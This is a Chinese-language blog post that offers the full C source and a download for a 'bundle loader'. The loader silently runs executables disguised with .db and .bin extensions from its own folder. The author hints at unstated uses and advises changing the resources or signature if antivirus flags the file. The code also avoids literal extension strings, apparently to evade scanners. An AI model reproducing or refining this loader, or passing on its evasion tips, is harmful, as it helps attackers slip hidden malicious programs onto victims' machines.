gura跳舞
首页网文心情网络杂谈原创 应用程序 捆绑加载器

原创 应用程序 捆绑加载器

分类网络杂谈时间2026-09-21 20:49:13发布heikeyh浏览14
导读:这是一个简单的 捆绑加载器 附带源码当执行LeekShell.exe后 先扫描当前目录 .db 的文件并运行 后找当前目录 .bin 的文件再执行打开!.db和.bin文件都必须是可执行PE程序无论加载成功与否 都全程静默 不会弹窗提示至于怎么用,用来干嘛........自己发挥......另。如果报毒的话,修改资源或者签名!...

这是一个简单的 捆绑加载器使用VS2019编译 附带源码

当执行LeekShell.exe后 

先扫描当前目录 .db 的文件并运行 

后找当前目录 .bin 的文件再执行打开!

.db和.bin文件都必须是可执行PE程序

无论加载成功与否  都全程静默 不会弹窗提示

至于怎么用,用来干嘛........自己发挥......

另。如果报毒的话,修改资源或者签名!

9d2e08b3-380e-447d-824c-fc4daa759b42.png


源码如下:

#include <windows.h>
#include <shlwapi.h>
#include <strsafe.h>

// Run a PE image directly by full path. Extension association is irrelevant.
// szCmdLine may be NULL/empty.
static BOOL RunDirect(LPCWSTR szExePath, LPCWSTR szCmdLine, LPCWSTR szWorkDir)
{
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    WCHAR szBuf[MAX_PATH * 4];
    if (szCmdLine && szCmdLine[0])
        StringCchPrintfW(szBuf, ARRAYSIZE(szBuf), L"\"%s\" %s", szExePath, szCmdLine);
    else
        StringCchPrintfW(szBuf, ARRAYSIZE(szBuf), L"\"%s\"", szExePath);

    BOOL ok = CreateProcessW(szExePath, szBuf, NULL, NULL, FALSE,
                             0, NULL, szWorkDir, &si, &pi);
    if (ok)
    {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    return ok;
}

int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
    // current exe directory
    WCHAR szDir[MAX_PATH];
    GetModuleFileNameW(NULL, szDir, MAX_PATH);
    PathRemoveFileSpecW(szDir);

    // convert ANSI command line to wide once
    WCHAR szCmdW[MAX_PATH * 4];
    if (lpCmd && lpCmd[0])
        MultiByteToWideChar(CP_ACP, 0, lpCmd, -1, szCmdW, ARRAYSIZE(szCmdW));
    else
        szCmdW[0] = 0;

    // scan every entry in the current directory
    WCHAR szPattern[MAX_PATH];
    StringCchPrintfW(szPattern, MAX_PATH, L"%s\\*", szDir);

    WIN32_FIND_DATAW fd;
    HANDLE hFind = FindFirstFileW(szPattern, &fd);
    if (hFind == INVALID_HANDLE_VALUE)
        return 0;

    do
    {
        if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            continue;

        // extension check without hardcoding ".db" / ".bin" literal strings
        const WCHAR* ext = wcsrchr(fd.cFileName, L'.');
        if (!ext || ext[1] == 0)
            continue;

        BOOL isDb  = (ext[1] == L'b' && ext[2] == L'd' && ext[3] == 0);
        BOOL isBin = (ext[1] == L'b' && ext[2] == L'i' && ext[3] == L'n' && ext[4] == 0);
        if (!isDb && !isBin)
            continue;

        WCHAR szPath[MAX_PATH];
        StringCchPrintfW(szPath, MAX_PATH, L"%s\\%s", szDir, fd.cFileName);

        // .db runs without arguments; .bin runs with the original command line
        if (isDb)
            RunDirect(szPath, NULL, szDir);
        else
            RunDirect(szPath, szCmdW, szDir);

    } while (FindNextFileW(hFind, &fd));

    FindClose(hFind);
    return 0;
}




捆绑加载器.zip
类型:压缩文件|已下载:0|下载方式:免费下载
立即下载

Hackyh'Blog版权声明:以上内容作者已申请原创保护,未经允许不得转载,侵权必究!授权事宜、对本内容有异议或投诉,敬请联系网站管理员,我们将尽快回复您,谢谢合作!

网络技术
文件夹加密商用版 文件加密工具 公司用的数据安全加密软件

游客 回复需填写必要信息
召唤伊斯特瓦尔